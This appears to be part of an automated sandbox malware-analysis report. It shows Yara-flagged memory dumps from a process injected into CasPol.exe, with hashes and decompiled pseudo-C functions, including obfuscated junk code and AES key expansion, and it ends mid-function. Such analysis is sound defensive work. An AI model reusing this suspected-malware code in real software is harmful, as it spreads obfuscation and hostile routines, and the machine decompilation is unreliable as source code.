                                                                0x016e107f
                                                                0x016e1082
                                                                0x016e1085
                                                                0x00000000
                                                                0x016e1085
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 817e45e0a425051a8f02aece8244c4f29bf633ba85861e3499bd212191efeeec
                                                                • Instruction ID: cc868772d2b013cb375a421df5a6b71cf7efbbf6bc0db0fdff9736baab07ea25
                                                                • Opcode Fuzzy Hash: 817e45e0a425051a8f02aece8244c4f29bf633ba85861e3499bd212191efeeec
                                                                • Instruction Fuzzy Hash: 6971B034602761CFDB28CF59C88467ABBF1FF46301B64866ED9928B740DB71E990EB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 48%
                                                                			E00422BF8(signed char __eax, void* __ebx, signed int __edx, signed int __esi) {
                                                                				signed char _t13;
                                                                				void* _t14;
                                                                				signed int _t15;
                                                                				signed int _t22;
                                                                				signed int _t24;
                                                                				signed char _t30;
                                                                				signed char _t33;
                                                                				void* _t37;
                                                                				intOrPtr _t38;
                                                                				signed int _t41;
                                                                				signed int _t45;
                                                                				intOrPtr _t46;
                                                                				signed int _t47;
                                                                				void* _t51;
                                                                				void* _t56;
                                                                
                                                                				_t13 = __eax;
                                                                				 *0xab9c4208 =  *0xab9c4208 ^ __edx;
                                                                				asm("adc esi, 0x32baf2c1");
                                                                				_push( *0xefa8e0cc);
                                                                				asm("cmpsw");
                                                                				_t41 = (__esi ^  *0x983e0416) -  *0xbed3f5bd;
                                                                				_pop(_t37);
                                                                				asm("adc [0xa4071c62], edi");
                                                                				 *0xcc32c1db =  *0xcc32c1db ^ _t45;
                                                                				 *0x16efa8e0 =  *0x16efa8e0 << 0x19;
                                                                				asm("ror dword [0x7c73a2fe], 0x77");
                                                                				 *0xef45d8a8 =  *0xef45d8a8 << 0x22;
                                                                				 *0xa0f4be16 =  *0xa0f4be16 >> 0xf6;
                                                                				asm("adc esi, [0x99d1b49b]");
                                                                				asm("adc [0x49395fa8], ah");
                                                                				asm("ror byte [0x947a16d2], 0x3d");
                                                                				 *0xdec32e33 =  *0xdec32e33 - _t37;
                                                                				 *0xe0cc32c1 = _t45;
                                                                				 *0xc16efa8 =  *0xc16efa8 >> 0xda;
                                                                				_t38 = _t37 + 1;
                                                                				asm("rol byte [0xccecc9b4], 0x58");
                                                                				 *0xcdc48616 =  *0x16d24939 - 0x0000001c | 0xf2;
                                                                				_t33 = 0x3c;
                                                                				asm("sbb esi, 0x32c1ddbd");
                                                                				_t30 =  *0xcdc48616 |  *0xefa8e0cc;
                                                                				_t56 = (__ebx +  *0xc4a8009a ^  *0x93b70016) - 1;
                                                                				if(_t56 < 0) {
                                                                					L1:
                                                                					asm("sbb [0x939ff7b7], ch");
                                                                					asm("sbb cl, [0x8f83e7b0]");
                                                                				} else {
                                                                					__ebp = __ebp & 0xaf88ac70;
                                                                					_pop(__edi);
                                                                					 *0x54942410 =  *0x54942410 >> 0x7b;
                                                                					 *0xaddd0fb4 =  *0xaddd0fb4 & __ch;
                                                                					asm("adc [0xef45d88d], esp");
                                                                					 *0x90e04c16 =  *0x90e04c16 ^ __edx;
                                                                					if( *0x90e04c16 > 0) {
                                                                						goto L1;
                                                                						do {
                                                                							do {
                                                                								do {
                                                                									do {
                                                                										do {
                                                                											do {
                                                                												goto L1;
                                                                											} while (_t56 == 0);
                                                                											_t22 =  *0xdc624d74;
                                                                											_t46 =  *0xc419e217;
                                                                											_t13 = _t13 + 0x84e5c4bb;
                                                                										} while (_t13 != 0);
                                                                										asm("adc [0xdd634e75], ebp");
                                                                										 *0xaeb00218 =  *0xaeb00218 - _t13;
                                                                									} while ( *0xaeb00218 >= 0);
                                                                									 *0xe77cd173 =  *0xe77cd173 >> 0x49;
                                                                									asm("lodsb");
                                                                									asm("sbb ecx, 0xef4544a1");
                                                                									asm("adc edx, [0x2f9d1616]");
                                                                									_t33 = _t33 ^ 0x0000001c;
                                                                									asm("adc [0x32c1ddbd], edx");
                                                                									 *0xefa8e0cc =  *0xefa8e0cc + _t13;
                                                                									asm("adc ecx, [0x85c02c16]");
                                                                									asm("adc eax, 0xb2efca25");
                                                                									asm("adc al, [0xa8e0cc32]");
                                                                									asm("adc [0xc6a616ef], eax");
                                                                									_t47 = _t46 + 1;
                                                                									 *0xa8e0cc32 =  *0xa8e0cc32 << 0xe9;
                                                                									 *0xc83916ef = _t22;
                                                                								} while ( *0xa8e0cc32 != 0);
                                                                								asm("ror dword [0x997775], 0x29");
                                                                								asm("rcl dword [0x45d8a8c4], 0xd9");
                                                                								asm("rol dword [0xe0cc32c1], 0xb2");
                                                                								asm("sbb al, 0xa8");
                                                                								_t38 = _t38 -  *0xc83816ef;
                                                                							} while (_t38 != 0);
                                                                							_t14 = _t13 + 1;
                                                                							_push(_t14);
                                                                							 *0xef45d88d = _t47;
                                                                							asm("rcl byte [0x4052173a], 0xd3");
                                                                							_push(_t14);
                                                                							asm("rol dword [0x81c42916], 0x83");
                                                                							asm("ror byte [0x4052173a], 0x66");
                                                                							 *0x9cba1d16 = _t41 & 0x81d04116 &  *0xef45d88d;
                                                                							_t15 = _t14;
                                                                							 *0xaddd0fb4 =  *0xaddd0fb4 << 0x90;
                                                                							asm("rol dword [0x87dbae16], 0x64");
                                                                							 *0xe7553110 =  *0xe7553110 >> 0x65;
                                                                							_t38 =  *0x453d99a1;
                                                                							asm("sbb edx, [0x32ee16ef]");
                                                                							asm("rcr dword [0xe0cc3283], 0x9b");
                                                                							_t24 = (_t22 |  *0xef45d88d) ^ 0x000000a8;
                                                                							 *0x6d2b16ef =  *0x6d2b16ef & _t15;
                                                                							asm("adc ah, [0xefbe0b1c]");
                                                                							 *0x8a16efa8 =  *0x8a16efa8 & _t15;
                                                                							_t41 =  *0xcc32bfdd;
                                                                							asm("adc esp, 0x2b7093ff");
                                                                							 *0xcc32c5f7 =  *0xcc32c5f7 ^ _t24;
                                                                							_t13 = _t15 &  *0xbe17ff2f | 0xe6;
                                                                							asm("rol byte [0xf216efa8], 0x92");
                                                                							asm("adc ch, 0x34");
                                                                							_t51 = _t51 -  *0xef45d88d -  *0xd9b004fa;
                                                                							 *0xe0cc32b9 =  *0xe0cc32b9 + _t30;
                                                                							_t33 = (_t33 +  *0x52173a7b |  *0x16efa8e0) & 0x000000a8;
                                                                							 *0xc62116ef =  *0xc62116ef >> 0xd8;
                                                                							asm("adc [0x1ee67b3], bl");
                                                                							asm("ror dword [0x395fc0d6], 0xaa");
                                                                							_t30 = _t30 - 1;
                                                                						} while (( *0xa2f716d2 & _t30) <= 0);
                                                                						asm("sbb [0xe2aa9076], esp");
                                                                						asm("adc edx, [0x395f828e]");
                                                                						 *0x36b616d2 =  *0x36b616d2 + _t24;
                                                                						asm("rcr dword [0xebb8140b], 0x4");
                                                                						 *0xa816efa8 =  *0xa816efa8 - _t13;
                                                                						 *0x9d8d8ce2 =  *0x9d8d8ce2 & _t33;
                                                                						asm("sbb [0x16efa8e0], cl");
                                                                						asm("sbb ecx, [0x1269e8e]");
                                                                						 *0x32c1d79c = 0xcc32aece;
                                                                						asm("rol dword [0x9af2ba16], 0x4a");
                                                                						 *0xccf9af86 =  *0xccf9af86 << 0x98;
                                                                						return _t13;
                                                                					} else {
                                                                						asm("rcl dword [0xa8008977], 0xc1");
                                                                						asm("adc ebx, 0x45d8a8c4");
                                                                						 *0x40ecb2a1 =  *0x40ecb2a1 << 0xe;
                                                                						asm("ror byte [0x8f16ef88], 0xfb");
                                                                						__edx = __edx |  *0x826380d6;
                                                                						 *0xd8a8c4a8 =  *0xd8a8c4a8 & __ch;
                                                                						__ebp = __ebp + 1;
                                                                						__edi = __edi |  *0x121f16ef;
                                                                						_push( *0xf9e2bbc);
                                                                						asm("adc ch, 0x88");
                                                                						__ebx =  *0x395fc2cc;
                                                                						 *0x941616d2 =  *0x941616d2 + __bh;
                                                                						 *0xdec32e33 = 0xe24b16ef;
                                                                						_push( *0xe0cc32c1);
                                                                						_t12 = __dl;
                                                                						__dl =  *0x6216efa8;
                                                                						 *0x6216efa8 = _t12;
                                                                						 *0x9a8081e2 =  *0x9a8081e2 & __bl;
                                                                						asm("rol dword [0x16ef45d8], 0xe2");
                                                                						asm("sbb [0x3a78d6b6], dh");
                                                                						__al = __al | 0x00000016;
                                                                						return __eax;
                                                                					}
                                                                				}
                                                                			}



















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1255c3b567cb2f402ac3d907e62502bd845f7c6f8968ebe21c9db83a3cc6eed2
                                                                • Instruction ID: a4e25e313fca7d11b0d8e206a134e9c9b3fc2bd5a26cd2836586e68674f23310
                                                                • Opcode Fuzzy Hash: 1255c3b567cb2f402ac3d907e62502bd845f7c6f8968ebe21c9db83a3cc6eed2
                                                                • Instruction Fuzzy Hash: 4181013284C7D1DFEB11DF78E89A6453F71F746320B48038EC9A15B6E2D3A4256ACB85
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 62%
                                                                			E004055AA(void* __ecx, void* __edx, void* __fp0, signed int* _a4, signed int* _a8, intOrPtr _a12) {
                                                                				void* _v117;
                                                                				signed int _t67;
                                                                				intOrPtr _t72;
                                                                				signed int* _t87;
                                                                				signed int _t100;
                                                                				signed int _t102;
                                                                				signed int _t112;
                                                                				signed int _t114;
                                                                				signed int* _t118;
                                                                				signed int _t135;
                                                                				signed int _t137;
                                                                				signed int _t141;
                                                                				void* _t142;
                                                                				signed int _t162;
                                                                				signed int* _t184;
                                                                
                                                                				asm("aaa");
                                                                				ds = _t142;
                                                                				asm("sti");
                                                                				_push(_t142);
                                                                				_t87 = _a8;
                                                                				_t118 = _a4;
                                                                				_push(_t142);
                                                                				asm("ror esi, 0x8");
                                                                				asm("rol eax, 0x8");
                                                                				 *_t118 =  *_t87 & 0xff00ff00 |  *_t87 & 0x00ff00ff;
                                                                				asm("ror edi, 0x8");
                                                                				asm("rol esi, 0x8");
                                                                				_t118[1] = _t87[1] & 0xff00ff00 | _t87[1] & 0x00ff00ff;
                                                                				asm("ror edi, 0x8");
                                                                				asm("rol esi, 0x8");
                                                                				_t118[2] = _t87[2] & 0xff00ff00 | _t87[2] & 0x00ff00ff;
                                                                				_t67 =  &(_t118[1]);
                                                                				asm("ror edi, 0x8");
                                                                				asm("rol esi, 0x8");
                                                                				_t118[3] = _t87[3] & 0xff00ff00 | _t87[3] & 0x00ff00ff;
                                                                				asm("ror edi, 0x8");
                                                                				asm("rol esi, 0x8");
                                                                				_t118[4] = _t87[4] & 0xff00ff00 | _t87[4] & 0x00ff00ff;
                                                                				asm("ror edi, 0x8");
                                                                				asm("rol esi, 0x8");
                                                                				_t118[5] = _t87[5] & 0xff00ff00 | _t87[5] & 0x00ff00ff;
                                                                				asm("ror edi, 0x8");
                                                                				asm("rol esi, 0x8");
                                                                				_t118[6] = _t87[6] & 0xff00ff00 | _t87[6] & 0x00ff00ff;
                                                                				asm("ror esi, 0x8");
                                                                				asm("rol ecx, 0x8");
                                                                				_t118[7] = _t87[7] & 0xff00ff00 | _t87[7] & 0x00ff00ff;
                                                                				if(_a12 != 0x100) {
                                                                					L5:
                                                                					return _t67 | 0xffffffff;
                                                                				} else {
                                                                					_t184 = _a4;
                                                                					_t72 = 0;
                                                                					_a12 = 0;
                                                                					while(1) {
                                                                						_t162 =  *(_t67 + 0x18);
                                                                						_t100 = ( *(_t184 + 4 + (_t162 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t184 + _t72 + 0x904) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t184 + 4 + (_t162 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t184 + 5 + (_t162 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t184 + 4 + (_t162 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t67 - 4);
                                                                						_t135 =  *_t67 ^ _t100;
                                                                						 *(_t67 + 0x1c) = _t100;
                                                                						_t102 =  *(_t67 + 4) ^ _t135;
                                                                						 *(_t67 + 0x20) = _t135;
                                                                						_t137 =  *(_t67 + 8) ^ _t102;
                                                                						 *(_t67 + 0x24) = _t102;
                                                                						 *(_t67 + 0x28) = _t137;
                                                                						if(_t72 == 6) {
                                                                							break;
                                                                						}
                                                                						_t112 = ( *(_t184 + 4 + (_t137 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t184 + 4 + (_t137 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t184 + 4 + (_t137 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t184 + 5 + (_t137 & 0x000000ff) * 4) & 0x000000ff ^  *(_t67 + 0xc);
                                                                						_t141 =  *(_t67 + 0x10) ^ _t112;
                                                                						 *(_t67 + 0x2c) = _t112;
                                                                						_t114 =  *(_t67 + 0x14) ^ _t141;
                                                                						 *(_t67 + 0x34) = _t114;
                                                                						_t72 = _a12 + 1;
                                                                						 *(_t67 + 0x30) = _t141;
                                                                						 *(_t67 + 0x38) = _t114 ^ _t162;
                                                                						_t67 = _t67 + 0x20;
                                                                						_a12 = _t72;
                                                                						if(_t72 < 7) {
                                                                							continue;
                                                                						} else {
                                                                							goto L5;
                                                                						}
                                                                						goto L7;
                                                                					}
                                                                					return 0xe;
                                                                				}
                                                                				L7:
                                                                			}



















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 78470efef8b83ad90903656706623e77d4caeb47580477f083feeb57f9351569
                                                                • Instruction ID: d65976331063c118bc800cb770b3bfde48423cf13a1b4923c01ad9f9c739599f
                                                                • Opcode Fuzzy Hash: 78470efef8b83ad90903656706623e77d4caeb47580477f083feeb57f9351569
                                                                • Instruction Fuzzy Hash: 8951A2B3E14A214BD318CE09CC40672B792FFD8312B5B81BEDD199B357CA34A9529A90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 67%
                                                                			E004055B3(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                                                                				signed int _t66;
                                                                				signed int* _t69;
                                                                				signed int* _t81;
                                                                				signed int _t94;
                                                                				signed int _t96;
                                                                				signed int _t106;
                                                                				signed int _t108;
                                                                				signed int* _t110;
                                                                				signed int _t127;
                                                                				signed int _t129;
                                                                				signed int _t133;
                                                                				signed int _t152;
                                                                				intOrPtr _t171;
                                                                
                                                                				_t81 = _a12;
                                                                				_t110 = _a8;
                                                                				asm("ror esi, 0x8");
                                                                				asm("rol eax, 0x8");
                                                                				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
                                                                				asm("ror edi, 0x8");
                                                                				asm("rol esi, 0x8");
                                                                				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
                                                                				asm("ror edi, 0x8");
                                                                				asm("rol esi, 0x8");
                                                                				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
                                                                				_t66 =  &(_t110[1]);
                                                                				asm("ror edi, 0x8");
                                                                				asm("rol esi, 0x8");
                                                                				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
                                                                				asm("ror edi, 0x8");
                                                                				asm("rol esi, 0x8");
                                                                				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
                                                                				asm("ror edi, 0x8");
                                                                				asm("rol esi, 0x8");
                                                                				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
                                                                				asm("ror edi, 0x8");
                                                                				asm("rol esi, 0x8");
                                                                				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
                                                                				asm("ror esi, 0x8");
                                                                				asm("rol ecx, 0x8");
                                                                				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
                                                                				if(_a16 != 0x100) {
                                                                					L4:
                                                                					return _t66 | 0xffffffff;
                                                                				} else {
                                                                					_t171 = _a4;
                                                                					_t69 = 0;
                                                                					_a12 = 0;
                                                                					while(1) {
                                                                						_t152 =  *(_t66 + 0x18);
                                                                						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                                                                						_t127 =  *_t66 ^ _t94;
                                                                						 *(_t66 + 0x1c) = _t94;
                                                                						_t96 =  *(_t66 + 4) ^ _t127;
                                                                						 *(_t66 + 0x20) = _t127;
                                                                						_t129 =  *(_t66 + 8) ^ _t96;
                                                                						 *(_t66 + 0x24) = _t96;
                                                                						 *(_t66 + 0x28) = _t129;
                                                                						if(_t69 == 6) {
                                                                							break;
                                                                						}
                                                                						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                                                                						_t133 =  *(_t66 + 0x10) ^ _t106;
                                                                						 *(_t66 + 0x2c) = _t106;
                                                                						_t108 =  *(_t66 + 0x14) ^ _t133;
                                                                						 *(_t66 + 0x34) = _t108;
                                                                						_t69 =  &(_a12[0]);
                                                                						 *(_t66 + 0x30) = _t133;
                                                                						 *(_t66 + 0x38) = _t108 ^ _t152;
                                                                						_t66 = _t66 + 0x20;
                                                                						_a12 = _t69;
                                                                						if(_t69 < 7) {
                                                                							continue;
                                                                						} else {
                                                                							goto L4;
                                                                						}
                                                                						goto L6;
                                                                					}
                                                                					return 0xe;
                                                                				}
                                                                				L6:
                                                                			}

















                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                • Instruction ID: 34d557361ff3680d8db281d09d546e6e6a82bb9cf3e5a1677a7a0fcf1fca399d
                                                                • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                • Instruction Fuzzy Hash: 385174B3E14A214BD3188E09CC40636B792FFD8312B5F81BEDD199B357CE74E9519A90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 78%
                                                                			E016252A5(char __ecx) {
                                                                				char _v20;
                                                                				char _v28;
                                                                				char _v29;
                                                                				void* _v32;
                                                                				void* _v36;
                                                                				void* _v37;
                                                                				void* _v38;
                                                                				void* _v40;
                                                                				void* _v46;
                                                                				void* _v64;
                                                                				void* __ebx;
                                                                				intOrPtr* _t49;
                                                                				signed int _t53;
                                                                				short _t85;
                                                                				signed int _t87;
                                                                				signed int _t88;
                                                                				signed int _t89;
                                                                				intOrPtr _t101;
                                                                				intOrPtr* _t102;
                                                                				intOrPtr* _t104;
                                                                				signed int _t106;
                                                                				void* _t108;
                                                                
                                                                				_t93 = __ecx;
                                                                				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                                				_push(_t88);
                                                                				_v29 = __ecx;
                                                                				_t89 = _t88 | 0xffffffff;
                                                                				while(1) {
                                                                					E0163EEF0(0x17179a0);
                                                                					_t104 =  *0x1718210; // 0x11c2c48
                                                                					if(_t104 == 0) {
                                                                						break;
                                                                					}
                                                                					asm("lock inc dword [esi]");
                                                                					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                                					E0163EB70(_t93, 0x17179a0);
                                                                					if( *((char*)(_t108 + 0xf)) != 0) {
                                                                						_t101 =  *0x7ffe02dc;
                                                                						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                                							L9:
                                                                							_push(0);
                                                                							_push(0);
                                                                							_push(0);
                                                                							_push(0);
                                                                							_push(0x90028);
                                                                							_push(_t108 + 0x20);
                                                                							_push(0);
                                                                							_push(0);
                                                                							_push(0);
                                                                							_push( *((intOrPtr*)(_t104 + 4)));
                                                                							_t53 = E01669890();
                                                                							__eflags = _t53;
                                                                							if(_t53 >= 0) {
                                                                								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                                									E0163EEF0(0x17179a0);
                                                                									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                                									E0163EB70(0, 0x17179a0);
                                                                								}
                                                                								goto L3;
                                                                							}
                                                                							__eflags = _t53 - 0xc0000012;
                                                                							if(__eflags == 0) {
                                                                								L12:
                                                                								_t13 = _t104 + 0xc; // 0x11c2c55
                                                                								_t93 = _t13;
                                                                								 *((char*)(_t108 + 0x12)) = 0;
                                                                								__eflags = E0165F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                								if(__eflags >= 0) {
                                                                									L15:
                                                                									_t102 = _v28;
                                                                									 *_t102 = 2;
                                                                									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                									E0163EEF0(0x17179a0);
                                                                									__eflags =  *0x1718210 - _t104; // 0x11c2c48
                                                                									if(__eflags == 0) {
                                                                										__eflags =  *((char*)(_t108 + 0xe));
                                                                										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                                										 *0x1718210 = _t102;
                                                                										_t32 = _t102 + 0xc; // 0x0
                                                                										 *_t95 =  *_t32;
                                                                										_t33 = _t102 + 0x10; // 0x0
                                                                										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                                										_t35 = _t102 + 4; // 0xffffffff
                                                                										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                                										if(__eflags != 0) {
                                                                											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                                											E016A4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                                										}
                                                                										E0163EB70(_t95, 0x17179a0);
                                                                										asm("lock xadd [esi], eax");
                                                                										if(__eflags == 0) {
                                                                											_push( *((intOrPtr*)(_t104 + 4)));
                                                                											E016695D0();
                                                                											L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                										}
                                                                										asm("lock xadd [esi], ebx");
                                                                										__eflags = _t89 == 1;
                                                                										if(_t89 == 1) {
                                                                											_push( *((intOrPtr*)(_t104 + 4)));
                                                                											E016695D0();
                                                                											L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                										}
                                                                										_t49 = _t102;
                                                                										L4:
                                                                										return _t49;
                                                                									}
                                                                									E0163EB70(_t93, 0x17179a0);
                                                                									asm("lock xadd [esi], eax");
                                                                									if(__eflags == 0) {
                                                                										_push( *((intOrPtr*)(_t104 + 4)));
                                                                										E016695D0();
                                                                										L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                									}
                                                                									 *_t102 = 1;
                                                                									asm("lock xadd [edi], eax");
                                                                									if(__eflags == 0) {
                                                                										_t28 = _t102 + 4; // 0xffffffff
                                                                										_push( *_t28);
                                                                										E016695D0();
                                                                										L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                                									}
                                                                									continue;
                                                                								}
                                                                								_t93 =  &_v20;
                                                                								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                                								_t85 = 6;
                                                                								_v20 = _t85;
                                                                								_t87 = E0165F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                								__eflags = _t87;
                                                                								if(_t87 < 0) {
                                                                									goto L3;
                                                                								}
                                                                								 *((char*)(_t108 + 0xe)) = 1;
                                                                								goto L15;
                                                                							}
                                                                							__eflags = _t53 - 0xc000026e;
                                                                							if(__eflags != 0) {
                                                                								goto L3;
                                                                							}
                                                                							goto L12;
                                                                						}
                                                                						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                                						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                                							goto L3;
                                                                						} else {
                                                                							goto L9;
                                                                						}
                                                                					}
                                                                					L3:
                                                                					_t49 = _t104;
                                                                					goto L4;
                                                                				}
                                                                				_t49 = 0;
                                                                				goto L4;
                                                                			}

























                                                                0x01625303
                                                                0x01625307
                                                                0x00000000
                                                                0x01625309
                                                                0x00000000
                                                                0x01625309
                                                                0x01625307
                                                                0x016252e9
                                                                0x016252e9
                                                                0x00000000
                                                                0x016252e9
                                                                0x0162530e
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e7f38c8f7d36d7cb22b355100015cbe40466839aaff9f7bac6cf86287cc93f3f
                                                                • Instruction ID: e36d54688c181f9f1e18dee60b7bc0d73b30e3f7115aa885691f0278cb03a2c3
                                                                • Opcode Fuzzy Hash: e7f38c8f7d36d7cb22b355100015cbe40466839aaff9f7bac6cf86287cc93f3f
                                                                • Instruction Fuzzy Hash: D451BE712057429BD322EF28CC40B67BBE6FF94710F14491EF99687691E774E808CBA6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E01652AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                                                				signed short* _v8;
                                                                				signed short* _v12;
                                                                				intOrPtr _v16;
                                                                				intOrPtr _v20;
                                                                				intOrPtr _v24;
                                                                				intOrPtr* _v28;
                                                                				signed int _v32;
                                                                				signed int _v36;
                                                                				short _t56;
                                                                				signed int _t57;
                                                                				intOrPtr _t58;
                                                                				signed short* _t61;
                                                                				intOrPtr _t72;
                                                                				intOrPtr _t75;
                                                                				intOrPtr _t84;
                                                                				intOrPtr _t87;
                                                                				intOrPtr* _t90;
                                                                				signed short* _t91;
                                                                				signed int _t95;
                                                                				signed short* _t96;
                                                                				intOrPtr _t97;
                                                                				intOrPtr _t102;
                                                                				signed int _t108;
                                                                				intOrPtr _t110;
                                                                				signed int _t111;
                                                                				signed short* _t112;
                                                                				void* _t113;
                                                                				signed int _t116;
                                                                				signed short** _t119;
                                                                				short* _t120;
                                                                				signed int _t123;
                                                                				signed int _t124;
                                                                				void* _t125;
                                                                				intOrPtr _t127;
                                                                				signed int _t128;
                                                                
                                                                				_t90 = __ecx;
                                                                				_v16 = __edx;
                                                                				_t108 = _a4;
                                                                				_v28 = __ecx;
                                                                				_t4 = _t108 - 1; // -1
                                                                				if(_t4 > 0x13) {
                                                                					L15:
                                                                					_t56 = 0xc0000100;
                                                                					L16:
                                                                					return _t56;
                                                                				}
                                                                				_t57 = _t108 * 0x1c;
                                                                				_v32 = _t57;
                                                                				_t6 = _t57 + 0x1718204; // 0x0
                                                                				_t123 =  *_t6;
                                                                				_t7 = _t57 + 0x1718208; // 0x1718207
                                                                				_t8 = _t57 + 0x1718208; // 0x1718207
                                                                				_t119 = _t8;
                                                                				_v36 = _t123;
                                                                				_t110 = _t7 + _t123 * 8;
                                                                				_v24 = _t110;
                                                                				_t111 = _a4;
                                                                				if(_t119 >= _t110) {
                                                                					L12:
                                                                					if(_t123 != 3) {
                                                                						_t58 =  *0x1718450; // 0x0
                                                                						if(_t58 == 0) {
                                                                							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                                                						}
                                                                					} else {
                                                                						_t26 = _t57 + 0x171821c; // 0x0
